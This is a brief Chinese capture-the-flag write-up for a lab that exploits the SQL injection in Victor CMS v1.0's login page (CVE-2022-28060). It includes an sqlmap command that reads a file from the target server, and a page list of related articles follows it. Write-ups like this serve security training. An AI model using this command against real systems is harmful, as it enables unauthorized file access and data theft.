春秋云镜 CVE-2022-28060

靶标介绍：

Victor CMS v1.0 /includes/login.php 存在sql注入

 1.打开环境之后进入该路径，看到一个登录界面

 2.尝试登录，并使用burp进行抓包

 3.将抓包的报文放到一个文件中

 4.使用sqlmap进行爆破

sqlmap -r 1.txt --file-read "/flag" --dbms mysql　　

 捕获该地址

cat /home/wxm/.local/share/sqlmap/output/eci-2zeiq2tg2xj2vwdexjfu.cloudeci1.ichunqiu.com/files/_flag

 拿到flag

本栏目推荐文章
• AtCoder World Tour 2022 B The Greatest Two
• 2021-2022 ICPC Northwestern European Regional Programming Contest (NWERC 2021)
• OFBiz RCE漏洞复现（CVE-2023-51467）
• 多态和虚函数 [补档-2022-10-23]
• 深拷贝和浅拷贝的问题 [补档-2022-10-22]
• P8368 [LNOI2022] 串
• origin2022导出图有水印
• 【专题】2022云上新型电力系统报告PDF合集分享（附原数据表）
• CVE-2023-34050 Spring AMQP Deserialization Vulnerability
• CVE-2020-11800

28060 2022 CVE28060 2022 cve 29464 2022 cve 32991 2022 cve 镜像2022 0788 cve 28512 2022 cve 24263 2022 cve amp cve 2022表达式 24663 2022 cve 28060 24481 2022 cve